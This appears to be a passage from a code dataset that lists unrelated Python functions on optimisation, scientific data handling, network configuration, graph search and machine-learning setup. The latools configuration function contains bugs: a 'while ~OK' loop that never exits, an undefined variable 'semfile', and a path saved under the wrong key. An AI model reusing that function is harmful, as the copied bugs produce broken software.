1\r\n continue\r\n if chemID == nameChem:\r\n if bestScoreDock == dock_score and bestScoreEmodel == emodel_score:\r\n pfilout = self.pr_bestPoses + nameChem + \".sdf\"\r\n if not path.exists(pfilout) or path.getsize(pfilout) < 20: # control if exist\r\n filout = open(pfilout, \"w\")\r\n filout.write(self.cPoses.lc[ipose][\"sdf\"])\r\n filout.close()\r\n # apply a format with babel to have a proper sdf\r\n runExternalSoft.babelConverttoSDF(pfilout)\r\n break\r\n\r\n else:\r\n lbest_poses.append(self.cPoses.lc[ipose])\r\n ipose = ipose + 1\r\n\r\n print \"NB best poses:\", len(self.cPoses.lc[ipose])", "def main(keep_best_count, mutation_factor, rounds, target, stagnate):\n ways = [range(len(DISTANCES))]\n result = {'round':0,'cost':None}\n for i in range(rounds):\n ways = mutate(ways,mutation_factor)\n best = []\n for way in ways:\n best.append((rate(way),way))\n best.sort()\n if VERBOSITY:\n for way in best:\n print way\n print \"Round %d best way is %s\" % (i+1, best[0][0])\n # break if we hit the target\n if best[0][0] <= target:\n print \"Hit Target\"\n break\n # break if we stagnate to long\n if result['cost'] is None or best[0][0] <result['cost']:\n result['cost'] = best[0][0]\n result['round'] = i+1\n elif result['round'] + stagnate <= i+1:\n print \"Stagnate to long\"\n break\n ways = list(b[1] for b in best[0:keep_best_count])\n print \"\"\n print \"best found order with cost=%d\" % best[0][0]\n print ' '.join(list(NAMES[i] for i in best[0][1]))\n print \"\"", "def WCA_SA(targetMDG, WCAresult):\n hill_climbers = []\n for i in range(NUM_Population):\n hill_climbers.append(SimulatedAnnealing(targetMDG, WCAresult))\n\n completed_climbers = []\n completed_max_climbers = []\n\n # k: int, number of neighbors to be considered\n k = 20\n i = 0\n not_increased = 0\n max_score = 0\n Temperature = 20\n\n while True:\n for climber in hill_climbers[:]:\n result = climber.climb_with_annealing(k, Temperature)\n if not result:\n completed_climbers.append(climber)\n hill_climbers.remove(climber)\n max_completed_climber = SimulatedAnnealing(targetMDG)\n max_completed_climber.result = climber.max_result\n max_completed_climber.update_score()\n completed_max_climbers.append(max_completed_climber)\n\n total_climbers = hill_climbers + completed_climbers + completed_max_climbers\n total_climbers.sort()\n print(\"Iteration \", i, \": \", total_climbers[-1].score)\n\n if total_climbers[-1].score - max_score != 0:\n not_increased = 0\n else:\n not_increased += 1\n\n if len(hill_climbers) == 0 or not_increased == 10:\n break\n i += 1\n max_score = total_climbers[-1].score\n if Temperature > 0:\n Temperature -= 0.5\n\n total_climbers = hill_climbers + completed_climbers + completed_max_climbers\n total_climbers.sort()\n\n max_climber = total_climbers[-1]\n\n print(\"TurboMQ = \", max_climber.score)\n for c in max_climber.result: # print all clusters which are not singleton\n if 1 != len(c.get_nodes()):\n print(c.get_nodes())\n\n max_climber.remove_empty_cluster()\n return max_climber.result", "def getNextTestCfg(self, fSkippedLast = False):\n asTestCfgCur = self.getCurrentTestCfg();\n\n asTestCfg = self.advanceTestCfg();\n while asTestCfg and self.isTestCfgBlacklisted(asTestCfg):\n asTestCfg = self.advanceTestCfg();\n\n # Compare the current and next config and close the approriate test\n # categories.\n reporter.testDone(fSkippedLast);\n if asTestCfg:\n idxSame = 0;\n while asTestCfgCur[idxSame] == asTestCfg[idxSame]:\n idxSame += 1;\n\n for i in range(idxSame, len(asTestCfg) - 1):\n reporter.testDone();\n\n for i in range(idxSame, len(asTestCfg)):\n reporter.testStart('%s' % (self.getTestIdString(asTestCfg[i], i)));\n\n else:\n # No more tests, mark all tests as done\n for i in range(0, len(asTestCfgCur) - 1):\n reporter.testDone();\n\n return asTestCfg;", "def apply_configs(task):\n\n if \"3750X\" in task.host[\"sw_model\"]:\n # run 3750X function\n aaa_3750x(task)\n\n # apply global config file for each host\n task.run(task=napalm_configure, filename=f\"configs/{task.host}_dot1x_global.txt\")\n # print completed hosts\n c_print(f\"*** {task.host}: dot1x global configuration applied ***\")\n # apply snmp config file for each host\n task.run(task=napalm_configure, filename=f\"configs/{task.host}_snmp.txt\")\n # print completed hosts\n c_print(f\"*** {task.host}: SNMP configuration applied ***\")\n # apply interface config file for each host\n task.run(task=napalm_configure, filename=f\"configs/{task.host}_dot1x_intf.txt\")\n # print completed hosts\n c_print(f\"*** {task.host}: dot1x interface configuration applied ***\")", "def intial_configuration():\n print(('You will be asked a few questions to configure latools\\n'\n 'for your specific laboratory needs.'))\n lab_name = input('What is the name of your lab? : ')\n\n params = {}\n OK = False\n while ~OK:\n srmfile = input('Where is your SRM.csv file? [blank = default] : ')\n if srmfile != '':\n if os.path.exists(srmfile):\n params['srmfile'] = srmfile\n OK = True\n else:\n print((\"You told us the SRM data file was at: \" + semfile +\n \"\\nlatools can't find that file. Please check it \"\n \"exists, and \\ncheck that the path was correct. \"\n \"The file path must be complete, not relative.\"))\n else:\n print((\"No path provided. Using default GeoRem values for \"\n \"NIST610, NIST612 and NIST614.\"))\n OK = True\n\n OK = False\n\n while ~OK:\n dataformatfile = input(('Where is your dataformat.dict file? '\n '[blank = default] : '))\n if dataformatfile != '':\n if os.path.exists(dataformatfile):\n params['srmfile'] = dataformatfile\n OK = True\n else:\n print((\"You told us the dataformat file was at: \" +\n dataformatfile + \"\\nlatools can't find that file. \"\n \"Please check it exists, and \\ncheck that the path \"\n \"was correct. The file path must be complete, not \"\n \"relative.\"))\n else:\n print((\"No path provided. Using default dataformat \"\n \"for the UC Davis Agilent 7700.\"))\n OK = True\n\n make_default = input(('Do you want to use these files as your '\n 'default? [Y/n] : ')).lower() != 'n'\n\n add_config(lab_name, params, make_default=make_default)\n\n print(\"\\nConfiguration set. You're good to go!\")\n\n return", "def get_config(self, **kwargs) -> Optional[Dict[str, Any]]:\n\n if self.current_individual >= len(self.current_population):\n raise Exception(\n \"It seems that some configurations are sill pending, while querying a new configuration. \"\n \"Note that NSGA-2 does not support asynchronous scheduling. To avoid this behaviour, \"\n \"make sure to set num_workers = 1.\"\n )\n else:\n individual = self.current_population[self.current_individual]\n\n self.current_individual += 1\n config = {}\n for hp_name, hp in self.config_space.items():\n if isinstance(hp, Domain):\n if isinstance(hp, FiniteRange):\n config[hp_name] = hp.values[individual.x[hp_name]]\n else:\n config[hp_name] = individual.x[hp_name]\n return config", "def test_nearest(self):\n dist = station.nearest(28.43, -81.31)\n stn = dist.pop(\"station\")\n self.assertIsInstance(stn, station.Station)\n self.assertEqual(stn.icao, \"KMCO\")\n for val in dist.values():\n self.assertIsInstance(val, float)\n for *params, count in (\n (30, -82, 10, True, True, 0.2, 1),\n (30, -82, 10, True, False, 0.2, 5),\n (30, -82, 10, False, False, 0.2, 6),\n (30, -82, 1000, True, True, 0.5, 6),\n (30, -82, 1000, False, False, 0.5, 37),\n ):\n stations = station.nearest(*params)\n self.assertEqual(len(stations), count)\n for dist in stations:\n stn = dist.pop(\"station\")\n self.assertIsInstance(stn, station.Station)\n for val in dist.values():\n self.assertIsInstance(val, float)", "def shortest_path(self):\n\t\t#dict that will hold the cost of traveling to each station\n\t\t#add the initial cost of the starting station, which is 0\n\t\tD = {0:0}\n\n\t\t#add all of our dict keys (stations) to our queue\n\t\tstation_queue = self.station_graph.keys()\n\n\t\t#sort the keys! since the graph is directed and acyclic, the stations\n\t\t#can be explored one at a time, in order, without having to adjust\n\t\t#for the lowest distance value via priority queue.\n\t\t#\n\t\t#sort them with reverse=True so that they can be popped from the\n\t\t#end of the list instead of from the beginning. This should save\n\t\t#some cpu time.\n\t\tstation_queue.sort(reverse=True)\n\t\twhile len(station_queue) > 0:\n\n\t\t\tstation = station_queue.pop() #grab the next node in the queue\n\n\t\t\tfor next_st, next_cost in self.station_graph[station].iteritems():\n\t\t\t\t#loops through the current station's neighbors, and calculates\n\t\t\t\t#their costs from the starting node, making sure to store\n\t\t\t\t#the lowest cost in our D dict\n\t\t\t\talt = D[station] + next_cost #sum the costs\n\t\t\t\tif not D.has_key(next_st) or alt < D[next_st]:\n\t\t\t\t\t#if there is no cost on record, or if the newly calculated\n\t\t\t\t\t#cost is lower than the currently recorded one, then\n\t\t\t\t\t#record the newly calculated cost as the lowest\n\t\t\t\t\tD[next_st] = alt #set the cost to get to next_st\n\n\t\treturn D[self.final_stop]", "def get_three_largest_stations_graph(filename):\n with open(filename) as f_in:\n reader = csv.DictReader(f_in)\n station = {} # This is a {station-id: station-name} dictionary. It is more efficient by using id.\n start_station_number = {} # This is a {station-id: number of connections} dictionary.\n start_station_route = {} # This is a {start-id: {end_id: number of connections}} dictionary.\n\n largest_station_id = 0\n largest_station_times = 0\n second_largest_station_id = 0\n second_largest_station_times = 0\n third_largest_station_id = 0\n third_largest_station_times = 0\n for row in reader:\n start_id = row['start station id']\n end_id = row['end station id']\n if station.get(start_id) is None:\n station[start_id] = row['start station name']\n if station.get(end_id) is None:\n station[end_id] = row['start station name']\n if start_station_route.get(start_id) is None:\n start_station_route[start_id] = {}\n start_station_route[start_id][end_id] = 1\n start_station_number[start_id] = 1\n else:\n start_station_number[start_id] += 1\n if start_station_route[start_id].get(end_id) is None:\n start_station_route[start_id][end_id] = 1\n else:\n start_station_route[start_id][end_id] += 1\n\n times = start_station_number[start_id]\n if times > third_largest_station_times:\n if times >= second_largest_station_times:\n if times >= largest_station_times:\n # If this one is the largest one, only adding the largest by one\n if start_id != largest_station_id:\n third_largest_station_id = second_largest_station_id\n third_largest_station_times = second_largest_station_times\n second_largest_station_id = largest_station_id\n second_largest_station_times = largest_station_times\n largest_station_id = start_id\n largest_station_times += 1\n else:\n # If this one is the second largest one, only adding the second largest by one\n if start_id != second_largest_station_id:\n third_largest_station_id = second_largest_station_id\n third_largest_station_times = second_largest_station_times\n second_largest_station_id = start_id\n second_largest_station_times = times\n else:\n third_largest_station_id = start_id\n third_largest_station_times = times\n\n # print the largest three stations information\n largest_station = station[largest_station_id]\n second_largest_station = station[second_largest_station_id]\n third_largest_station = station[third_largest_station_id]\n print(\"The largest three stations in NYC are {}, {}, and {}.\"\n .format(largest_station, second_largest_station, third_largest_station))\n print(\"{} has {} connections with {} stations.\".\n format(largest_station, largest_station_times, len(start_station_route[largest_station_id])))\n print(\"{} has {} connections with {} stations.\".\n format(second_largest_station, second_largest_station_times,\n len(start_station_route[second_largest_station_id])))\n print(\"{} has {} connections with {} stations.\".\n format(third_largest_station, third_largest_station_times,\n len(start_station_route[third_largest_station_id])))\n\n # sort the station_route by numbers of connections and get the first ten start-end connections\n largest_station_graph = get_station_graph(largest_station_id,\n sort_end_station_list(start_station_route[largest_station_id]))\n second_largest_station_graph = get_station_graph(second_largest_station_id, sort_end_station_list(\n start_station_route[second_largest_station_id]))\n third_largest_station_graph = get_station_graph(third_largest_station_id, sort_end_station_list(\n start_station_route[third_largest_station_id]))\n\n # convert the station-id back to station-name\n largest_station_graph = get_station_name(largest_station_graph, station)\n second_largest_station_graph = get_station_name(second_largest_station_graph, station)\n third_largest_station_graph = get_station_name(third_largest_station_graph, station)\n\n return largest_station_graph, second_largest_station_graph, third_largest_station_graph", "def on_game_start(self, config):\n gamelib.debug_write('Configuring your custom algo strategy...')\n self.config = config\n global FILTER, ENCRYPTOR, DESTRUCTOR, PING, EMP, SCRAMBLER\n FILTER = config[\"unitInformation\"][0][\"shorthand\"]\n ENCRYPTOR = config[\"unitInformation\"][1][\"shorthand\"]\n DESTRUCTOR = config[\"unitInformation\"][2][\"shorthand\"]\n PING = config[\"unitInformation\"][3][\"shorthand\"]\n EMP = config[\"unitInformation\"][4][\"shorthand\"]\n SCRAMBLER = config[\"unitInformation\"][5][\"shorthand\"]\n self.structureInPlace = False\n self.destructorsLeft = 0\n self.destructorsMiddle = 0\n self.juicyTargets = 0\n self.juicyCorner = False\n self.floodGatesOpen = True\n self.defenseRating = 0\n self.defenseCost = 0\n self.attackedFromLeft = 0\n\n self.mainStructure = [[ 25, 13],[ 24, 12],[ 23, 11],[ 22, 10],[ 21, 9],[ 20, 8],[ 19, 7],[ 18, 6],[ 17, 5],[ 16, 4],[ 15, 3],[ 14, 2],[ 13, 1]]\n\n\n self.filter0 =[[ 0, 13],[ 1, 13],[ 2, 13],[ 3, 13],[ 4, 13],[ 5, 13],[ 6, 13],[ 7, 13],[ 8, 13],\\\n [ 9, 13],[ 10, 13],[ 17, 13],[ 18, 13],[ 19, 13],[ 20, 13],[ 21, 13],[ 22, 13],[ 23, 13],[ 24, 13],[ 25, 13],[ 26, 13],[ 27, 13]] \n self.filter1 = [[ 0, 13],[ 1, 13],[ 2, 13],[ 3, 13],[ 4, 13],[ 5, 13],[ 6, 13],[ 7, 13],[ 8, 13],[ 9, 13],[ 10, 13],[ 17, 13],\\\n [ 18, 13],[ 19, 13],[ 20, 13],[ 21, 13],[ 22, 13],[ 23, 13],[ 24, 13],[ 25, 13],[ 26, 13],[ 27, 13],[ 2, 12],[ 25, 12],[ 3, 11],[ 24, 11],[ 4, 10]]\n self.filter2 = [[ 0, 13],[ 1, 13],[ 2, 13],[ 3, 13],[ 4, 13],[ 5, 13],[ 6, 13],[ 7, 13],[ 8, 13],[ 9, 13],[ 10, 13],[ 17, 13],\\\n [ 18, 13],[ 19, 13],[ 20, 13],[ 21, 13],[ 22, 13],[ 23, 13],[ 24, 13],[ 25, 13],[ 26, 13],[ 27, 13],[ 2, 12],[ 25, 12],[ 3, 11],[ 24, 11],[ 4, 10]]\n self.filter3 = [[ 4, 13],[ 5, 13],[ 6, 13],[ 7, 13]]\n\n self.destructor0 = [[ 13, 13]]\n self.destructor1 = [[ 13, 13],[ 14, 13]]\n self.destructor2 = [[ 13, 13],[ 14, 13]]\n self.destructor3 = [[ 13, 13],[ 14, 13]]\n\n self.initExclusionList = [[0,0]]\n self.exclusionList = [[0,0]]", "def perform_trials(self, evolver: 'Evolver'):\r\n\r\n approach_ind = evolver.approach[0]\r\n\r\n approach_params = evolver.approach_params.copy()\r\n approach_params[self.evolve_param.name] = self.checking\r\n\r\n sens_params = self.new_sensitives.copy()\r\n sens_params[self.sensitive[1].name] = self.sens_checking\r\n\r\n trial_best = float('-inf')\r\n trial_patience = evolver.settings.trial_patience\r\n trial_epsilon = evolver.settings.trial_epsilon\r\n trial_patience_used = 0\r\n trial_index = 0\r\n\r\n if self.sensitive[1].categorical:\r\n metric_store = self.sens_sweep[self.sens_checking]\r\n else:\r\n evolver.logger.debug('sens_sweep_pts=%s, sens_sweep_len=%s, sens_checking=%s', self.sens_sweep_pts, self.sens_sweep_len, self.sens_checking)\r\n insert_ind = (\r\n np.searchsorted(self.sens_sweep_pts[:self.sens_sweep_len], self.sens_checking)\r\n if self.sens_sweep_len > 0\r\n else 0\r\n )\r\n assert isinstance(insert_ind, (int, np.int32, np.int64)), f'insert_ind={insert_ind}, type(insert_ind)={type(insert_ind)}'\r\n if insert_ind < self.sens_sweep_len:\r\n self.sens_sweep_pts[insert_ind+1:self.sens_sweep_len+1] = (\r\n self.sens_sweep_pts[insert_ind:self.sens_sweep_len])\r\n self.sens_sweep_pts[insert_ind] = self.sens_checking\r\n\r\n self.sens_sweep[insert_ind+1:self.sens_sweep_len+1] = (\r\n self.sens_sweep[insert_ind:self.sens_sweep_len])\r\n self.sens_sweep[insert_ind, :] = 0\r\n else:\r\n self.sens_sweep_pts[insert_ind] = self.sens_checking\r\n metric_store = self.sens_sweep[insert_ind]\r\n\r\n while (trial_index < evolver.settings.max_trials\r\n and trial_patience_used < trial_patience):\r\n for worker in evolver.workers:\r\n worker.job_queue.put((approach_ind, approach_params.copy(), sens_params.copy()))\r\n evolver.logger.debug('dispatched jobs')\r\n\r\n for worker in evolver.workers:\r\n while True:\r\n try:\r\n result = worker.result_queue.get()\r\n break\r\n except InterruptedError:\r\n evolver.logger.critical('result_queue.get() was interrupted')\r\n\r\n if trial_index == evolver.settings.max_trials:\r\n continue\r\n result_metric = result[evolver.settings.metric_name]\r\n metric_store[trial_index] = result_metric\r\n trial_index += 1\r\n\r\n if result_metric - trial_epsilon > trial_best:\r\n evolver.logger.debug('got trial metric %s (improved old: %s)', result_metric, trial_best)\r\n trial_best = result_metric\r\n if trial_patience_used < trial_patience:\r\n trial_patience_used = 0\r\n elif trial_patience_used < trial_patience:\r\n trial_patience_used += 1\r\n evolver.logger.debug('got trial metric %s, exhausted patience %s/%s',\r\n result_metric, trial_patience_used, trial_patience)\r\n else:\r\n evolver.logger.debug('got trial metric %s (worse, but already out of patience)', result_metric)", "def find_alt_assignments(self, N=1, by_ss=True, verbose=False):\n \n obs = self.obs\n preds = self.preds\n log_prob_matrix = self.log_prob_matrix\n #best_match_indexes = self.best_match_indexes\n best_matching = self.assign_df.loc[:,[\"SS_name\",\"Res_name\"]]\n best_matching.index = best_matching[\"SS_name\"]\n alt_matching = None\n \n # Calculate sum probability for the best matching\n best_sum_prob = sum(log_prob_matrix.lookup(\n best_matching[\"SS_name\"], best_matching[\"Res_name\"]))\n \n # Calculate the value used to penalise the best match for each residue\n penalty = 2*log_prob_matrix.min().min() \n logging.debug(\"Penalty value: %f\", penalty)\n \n # Initialise DataFrame for storing alt_assignments\n alt_matching_all = best_matching.copy()\n alt_matching_all[\"Rank\"] = 1\n alt_matching_all[\"Rel_prob\"] = 0\n \n \n for i in best_matching.index: # Consider each spin system in turn\n ss = best_matching.loc[i, \"SS_name\"]\n res = best_matching.loc[i, \"Res_name\"]\n logging.debug(\"Finding alt assignments for original match %s - %s\", ss, res)\n if verbose: print(ss, res)\n \n excluded = best_matching.loc[[i], :]\n \n for j in range(N):\n alt_matching = self.find_best_assignment2(exc=excluded)\n \n alt_matching[\"Rank\"] = j+2\n alt_sum_prob = sum(self.log_prob_matrix.lookup(\n alt_matching[\"SS_name\"], alt_matching[\"Res_name\"]))\n alt_matching[\"Rel_prob\"] = alt_sum_prob - best_sum_prob\n \n \n # Add the alt match for this ss or res to the results dataframe \n # and also the excluded dataframe.\n if by_ss:\n alt_matching_all = alt_matching_all.append(\n alt_matching.loc[alt_matching[\"SS_name\"]==ss, :], \n ignore_index=True)\n res = alt_matching.loc[alt_matching[\"SS_name\"]==ss, \n \"Res_name\"].tolist()[0]\n # The .tolist()[0] is to convert a single-item series into a string.\n else:\n alt_matching_all = alt_matching_all.append(\n alt_matching.loc[alt_matching[\"Res_name\"]==res, :], \n ignore_index=True)\n ss = alt_matching.loc[alt_matching[\"Res_name\"]==res, \n \"SS_name\"].tolist()[0]\n excluded = excluded.append(pd.DataFrame({\"SS_name\":[ss],\"Res_name\":[res]}), \n ignore_index=True)\n \n self.alt_assign_df = self.make_assign_df(alt_matching_all)\n if by_ss:\n self.alt_assign_df = self.alt_assign_df.sort_values(\n by=[\"SS_name\", \"Rank\"])\n else:\n self.alt_assign_df = self.alt_assign_df.sort_values(\n by=[\"Res_name\", \"Rank\"])\n \n return(self.alt_assign_df)", "def _default_config(self):\n return {\n 'penalty': 'l1',\n 'solver': 'liblinear'\n }", "def rrt_search(self):\n self.tree.AddVertex(self.start_config)\n self.tree.AddEdge(self.start_config, self.start_config)\n\n while True:\n x_new, x_nearest = self.new_and_near()\n if x_new is None:\n # print(\"it's None\")\n continue\n # connect shortest valid edge\n # print(\"new point\", x_new)\n self.connect_to_point(x_nearest, x_new)\n\n # probabilistically check if solution found\n if self.goal_config in self.tree.vertices:\n print(\"find it\")\n path = self.planning_env.reconstruct_path(self.tree.edges, self.start_config, self.goal_config)\n if path is not None:\n return path\n\n if self.name=='rrtstar' and self.tree.samples_taken > 10:\n return []\n # # check if can connect to goal after generating max_samples\n if self.tree.samples_taken >= self.tree.max_samples:\n return []", "def train_a_config_return_a_model(trial,optimsetting,szshuf_setng):\n noepoch = trial[0]\n nolayer = trial[1]\n nonodes = trial[2]\n optmfunc = optimsetting\n\n btchsize = szshuf_setng[0]\n shufBOOL = szshuf_setng[1]\n\n curr_model, curr_info = config_new_model(nolayer,nonodes)\n # technially, it doesn't matter what the optimization function is.\n # we can just pass it through directly.\n # what needs to change is how we fit the model\n curr_model.compile(optimizer=optmfunc, loss=\"mse\")\n\n print(\"Within train_a_config. Prepping to train:\")\n print(\"\\t{} {} {}\".format(optmfunc,btchsize,shufBOOL))\n # now we fit appropriately.\n # we set batch_size and shuffle\n # defaults are 32 and True\n # we will also try 1 and False\n trn_model = curr_model.fit(Z_train, y_train,\n validation_data=(Z_validation,y_validation),\n epochs=noepoch, verbose=0,\n batch_size=btchsize,\n shuffle=shufBOOL)\n \n ret_dict = {\"epochs\":trn_model.epoch[-1]+1,\n \"config\":curr_info,\n \"result\":trn_model.history,\n \"setngs\":{\"optimization\":optmfunc},\n \"compil\":{\"batchsize\":btchsize,\n \"shuffled\":shufBOOL}}\n return ret_dict, trn_model", "def improve(self):\n tour = Tour(self.heuristic_path)\n\n # Find all valid 2-opt moves and try them\n for t1 in self.heuristic_path:\n around = tour.around(t1)\n\n for t2 in around:\n broken = set([makePair(t1, t2)])\n # Initial savings\n gain = TSP.dist(t1, t2)\n\n close = self.closest(t2, tour, gain, broken, set())\n\n # Number of neighbours to try\n tries = 5\n\n for t3, (_, Gi) in close:\n # Make sure that the new node is none of t_1's neighbours\n # so it does not belong to the tour.\n if t3 in around:\n continue\n\n joined = set([makePair(t2, t3)])\n\n # The positive Gi is taken care of by `closest()`\n Log.debug(\"Start: X: {} - Y: {} = {}\".format((t1, t2),\n (t2, t3), Gi))\n\n if self.chooseX(tour, t1, t3, Gi, broken, joined):\n # Return to Step 2, that is the initial loop\n return True\n # Else try the other options\n\n tries -= 1\n # Explored enough nodes, change t_2\n if tries == 0:\n break\n\n return False", "def get_config(seed, shot):\n if args.coco:\n # COCO\n assert args.two_stage, 'Only supports novel weights for COCO now'\n\n if args.novel_finetune:\n # Fine-tune novel classifier\n ITERS = {\n 1: (10000, 500),\n 2: (10000, 1500),\n 3: (10000, 1500),\n 5: (10000, 1500),\n 10: (10000, 2000),\n 30: (10000, 6000),\n }\n mode = 'novel'\n\n assert not args.fc and not args.unfreeze\n else:\n # Fine-tune entire classifier\n ITERS = {\n 1: (14400, 16000),\n 2: (28800, 32000),\n 3: (43200, 48000),\n 5: (72000, 80000),\n 10: (144000, 160000),\n 30: (216000, 240000),\n }\n mode = 'all'\n split = temp_split = ''\n temp_mode = mode\n\n config_dir = 'configs/COCO-detection'\n ckpt_dir = 'checkpoints/coco/faster_rcnn'\n base_cfg = '../../Base-RCNN-FPN.yaml'\n else:\n # PASCAL VOC\n assert not args.two_stage, 'Only supports random weights for PASCAL now'\n\n ITERS = {\n 1: (3500, 4000),\n 2: (7000, 8000),\n 3: (10500, 12000),\n 5: (17500, 20000),\n 10: (35000, 40000),\n }\n split = 'split{}'.format(args.split)\n mode = 'all{}'.format(args.split)\n # temp_split = 'split1'\n # temp_mode = 'all1'\n temp_split=split\n temp_mode = mode\n\n config_dir = 'configs/PascalVOC-detection'\n ckpt_dir = 'checkpoints/voc/faster_rcnn'\n base_cfg = '../../../Base-RCNN-FPN.yaml'\n\n seed_str = 'seed{}'.format(seed) if seed != 0 else ''\n fc = '_fc' if args.fc else ''\n unfreeze = '_unfreeze' if args.unfreeze else ''\n # Read an example config file for the config parameters\n temp = os.path.join(\n temp_split, 'faster_rcnn_R_101_FPN_ft{}_{}_1shot{}'.format(\n fc, temp_mode, unfreeze)\n )\n print('temp_file:', temp)\n config = os.path.join(args.root, config_dir, temp + '.yaml')\n print('config_file:', config)\n\n prefix = 'faster_rcnn_R_101_FPN_ft{}_{}_{}shot{}{}'.format(\n fc, mode, shot, unfreeze, args.suffix)\n print('prefix_file:', prefix)\n\n output_dir = os.path.join(args.root, ckpt_dir, seed_str)\n print('output_dir',output_dir)\n os.makedirs(output_dir, exist_ok=True)\n \n save_dir = os.path.join(\n args.root, config_dir, split, seed_str,\n )\n print('save_dir',save_dir)\n os.makedirs(save_dir, exist_ok=True)\n save_file = os.path.join(save_dir, prefix + '.yaml')\n print('save_file' , save_file)\n\n configs = load_yaml_file(config)\n print('reading from this config file ',config)\n configs['_BASE_'] = base_cfg\n configs['DATASETS']['TRAIN'] = make_tuple(configs['DATASETS']['TRAIN'])\n configs['DATASETS']['TEST'] = make_tuple(configs['DATASETS']['TEST'])\n if args.coco and not args.novel_finetune:\n ckpt_path = os.path.join(output_dir, prefix, 'model_reset_combine.pth')\n if not os.path.exists(ckpt_path):\n src2 = os.path.join(\n output_dir, 'faster_rcnn_R_101_FPN_ft_novel_{}shot{}'.format(\n shot, args.suffix),\n 'model_final.pth',\n )\n if not os.path.exists(src2):\n print('Novel weights do not exist. Please run with the ' + \\\n '--novel-finetune flag first.')\n assert False\n combine_cmd = 'python tools/ckpt_surgery.py --coco --method ' + \\\n 'combine --src1 checkpoints/coco/faster_rcnn/faster_rcnn' + \\\n '_R_101_FPN_base/model_final.pth --src2 {}'.format(src2) + \\\n ' --save-dir {}'.format(os.path.join(output_dir, prefix))\n run_cmd(combine_cmd)\n assert os.path.exists(ckpt_path)\n configs['MODEL']['WEIGHTS'] = ckpt_path\n elif not args.coco:\n configs['MODEL']['WEIGHTS'] = configs['MODEL']['WEIGHTS'].replace(\n 'base1', 'base' + str(args.split))\n for dset in ['TRAIN', 'TEST']:\n configs['DATASETS'][dset] = (\n configs['DATASETS'][dset][0].replace(\n temp_mode, 'all' + str(args.split)),\n )\n configs['DATASETS']['TRAIN'] = (\n configs['DATASETS']['TRAIN'][0].replace(\n '1shot', str(shot) + 'shot'\n ) + ('_{}'.format(seed_str) if seed_str != '' else ''),\n )\n configs['SOLVER']['BASE_LR'] = args.lr\n configs['SOLVER']['MAX_ITER'] = ITERS[shot][1]\n configs['SOLVER']['STEPS'] = (ITERS[shot][0],)\n configs['SOLVER']['CHECKPOINT_PERIOD'] = ITERS[shot][1] // args.ckpt_freq\n configs['OUTPUT_DIR'] = os.path.join(output_dir, prefix)\n\n if seed != 0:\n with open(save_file, 'w') as fp:\n yaml.dump(configs, fp)\n\n return save_file, configs", "def run_config_space(pc, learner_config_space, get_val_results, baseline=False):\n\n # load data\n data = prepare_data(pc, dim=learner_config_space.dim)\n\n if baseline:\n do_baseline(data)\n return\n\n # search for best parameters on the validation set\n mse_scores, val_results = get_val_results(data, learner_config_space, pc)\n\n # select the best config according to validation set results\n best_config, val_result = get_best_config(learner_config_space, pc,\n mse_scores, val_results)\n\n yhat_is = data.revert(val_result.yhat_is, \"train\", True)\n yhat_val = data.revert(val_result.yhat_oos, \"val\", True)\n\n yhat_is_list = [data.revert(x, \"train\", True) for x in val_result.yhat_is_list]\n yhat_val_list = [data.revert(x, \"val\", True) for x in val_result.yhat_oos_list]\n\n LOGGER.info(\"Best config %s:\\t%.3f\\t%.3f\\t%.3f\\t%.3f\\t%.3f\\t%.3f\\t%s\" % (\n best_config.vals,\n val_result.train_mse, val_result.test_mse,\n val_result.train_mae, val_result.test_mae,\n val_result.train_mape, val_result.test_mape,\n yhat_val))\n\n LOGGER.info(\"Informative features:\")\n for k, v in val_result.feature_scores[:5]:\n LOGGER.info(\"%s: %.3f\" % (k, v))\n\n return {\n 'date': best_config.datetime,\n 'preproc_config': pc,\n 'learner': best_config.learner,\n 'best_learner_config': best_config.vals,\n 'mse': {\n 'train': {\n 'mean': val_result.train_mse,\n 'std': val_result.train_mse_std,\n 'obs': val_result.train_mse_list\n },\n 'val': {\n 'mean': val_result.test_mse,\n 'std': val_result.test_mse_std,\n 'obs': val_result.test_mse_list,\n },\n },\n 'mae': {\n 'train': {\n 'mean': val_result.train_mae,\n 'std': val_result.train_mae_std,\n 'obs': val_result.train_mae_list\n },\n 'val': {\n 'mean': val_result.test_mae,\n 'std': val_result.test_mae_std,\n 'obs': val_result.test_mae_list,\n },\n },\n 'mape': {\n 'train': {\n 'mean': val_result.train_mape,\n 'std': val_result.train_mape_std,\n 'obs': val_result.train_mape_list\n },\n 'val': {\n 'mean': val_result.test_mape,\n 'std': val_result.test_mape_std,\n 'obs': val_result.test_mape_list,\n }\n },\n 'yhat_is': {\n 'mean': yhat_is,\n 'obs': yhat_is_list\n },\n 'yhat_val': {\n 'mean': yhat_val,\n 'obs': yhat_val_list\n },\n 'validation_runs': [{'config': dict(x),\n 'scores': {'mse': v.test_mse,\n 'mae': v.test_mae,\n 'mape': v.test_mape}}\n for x, v in val_results.items()],\n 'feature_scores': val_result.feature_scores,\n 'permuted_scores': val_result.permuted_scores\n }", "def make_tree(self):\n\n # list [station_name]\n visited = []\n\n # creates empty station object for each station and adds coordinates\n for station in self.stations:\n new_station = Station(station)\n coordinates = self.stations[station].get_coordinates()\n new_station.add_coordinates(coordinates[0], coordinates[1])\n\n # saves station in prims_tree dictionary\n self.prims_tree[station] = new_station\n\n # choose random beginning station\n random_station = random.choice(list(self.stations.values()))\n\n # sort station connections and retrieve shortest\n station_connections = random_station.get_connections()\n station_connections = sorted(station_connections.items(), key=operator.itemgetter(1))\n new_connection = station_connections.pop(0)\n new_station = new_connection[0]\n new_time = new_connection[1]\n\n # retrieve empty stations from prims_tree dictionary\n first_station = self.prims_tree[random_station.name]\n new_station = self.prims_tree[new_station.name]\n\n # add shortest connection to stations\n first_station.add_connection(new_station, new_time)\n new_station.add_connection(first_station, new_time)\n\n # add stations to visited\n visited.append(first_station.name)\n visited.append(new_station.name)\n\n # runs until all stations are visited\n while len(visited) is not len(self.prims_tree):\n # starts as arbitrarily high number\n min_connection_time = 9999\n\n # get connections of visited stations\n for station in visited:\n connections = self.stations[station].get_connections()\n\n # get time of connections\n for connection in connections:\n connection_time = connections[connection]\n\n # save smallest connection if time is smallest and station is not visited\n if connection.name not in visited and connection_time < min_connection_time:\n smallest_connection = self.prims_tree[connection.name]\n smallest_connection_station = self.prims_tree[station]\n min_connection_time = connection_time\n else:\n continue\n\n # add smallest connection to station in prims_tree dictionary\n smallest_connection_station.add_connection(smallest_connection, min_connection_time)\n smallest_connection.add_connection(smallest_connection_station, min_connection_time)\n\n # add new connection to visited list\n 